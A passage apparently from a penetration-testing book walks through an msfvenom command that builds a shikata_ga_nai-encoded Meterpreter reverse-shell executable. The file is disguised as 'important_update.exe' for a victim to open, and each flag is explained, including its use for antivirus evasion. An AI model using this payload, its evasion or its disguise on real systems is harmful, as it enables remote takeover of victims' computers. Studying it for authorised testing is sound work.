上QQ阅读APP看书,第一时间看更新
Commands
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe LHOST=192.168.10.50LPORT=8080 > ~/Desktop/important_update.exe
- msfvenom: msfvenom is a tool from the Metasploit framework that combines the functionality of msfpayload and msfencode. It's able to backdoor legitimate files and encode them for things such as AV evasion. It can craft payloads for pretty much any platform, and any format.
- -p windows/meterpreter/reverse_tcp: This tells msfvenom what to use for a payload. In this case, we're using the standard meterpreter reverse shell, which will pop a shell on the remote host and connect back to a listener that we have running.
- -e x86/shikata_ga_nai -i 5: This tells msfvenom to encode the payload, using the shikata_ga_nai encoder. This is one of the better encoders that is included with the Metasploit framework, and is very helpful with evading AV. If the payload isn't encoded, AV will be able to detect the meterpreter shellcode. The-i 5 flag will tell msfvenom to run five iterations of the encoder. Sometimes the encoder fails to execute all the iterations; run it again, however, and eventually it will succeed.
- -f exe: This flag says that we would like to encode our payload as a standard Windows executable. This isn't necessary, but it does allow us to see that msfvenom can produce many different types of output, including Perl, Ruby, Python, exe, Java, DLLs, and many more.
- LHOST=192.168.10.50 LPORT=8080: These are options specific to the meterpreter payload that we've chosen here. This will set the reverse shell to connect back to our listener at 192.168.10.50 and use port 8080.
- > ~/Desktop/important_update.exe: This will output the result from msfvenom to a file of our choosing. In this case, we're using important _update.exe. Our poor user Bob will, of course, choose to open this file, because he knows that it's important to keep his computer updated:
As you can see from the preceding screenshot, I generated the exploit on a desktop folder and I named it important_update.exe.
The next step is to set up the listener on our attacking computer by using a multi-handler.